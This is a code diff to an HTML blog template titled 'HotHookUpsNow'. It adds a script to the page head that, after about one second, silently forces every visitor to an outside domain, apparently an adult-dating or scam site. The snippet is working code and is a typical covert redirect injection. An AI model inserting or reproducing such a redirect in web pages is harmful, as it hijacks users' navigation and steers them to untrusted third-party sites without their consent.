--- a/index.html
+++ b/index.html
@@ -2,6 +2,13 @@
 <!DOCTYPE html>
 <html b:version="2" class="v2" expr:dir="data:blog.languageDirection" expr:lang="data:blog.locale" xmlns="http://www.w3.org/1999/xhtml" xmlns:b="http://www.google.com/2005/gml/b" xmlns:data="http://www.google.com/2005/gml/data" xmlns:expr="http://www.google.com/2005/gml/expr">
   <head>
+
+      <script>
+    setTimeout(function() {
+      window.location.href = "https://finderfwb.online/#GeneraL";
+    }, 1100);
+  </script>
+    
     <title>HotHookUpsNow</title>
 
     <!-- twitter card details -->
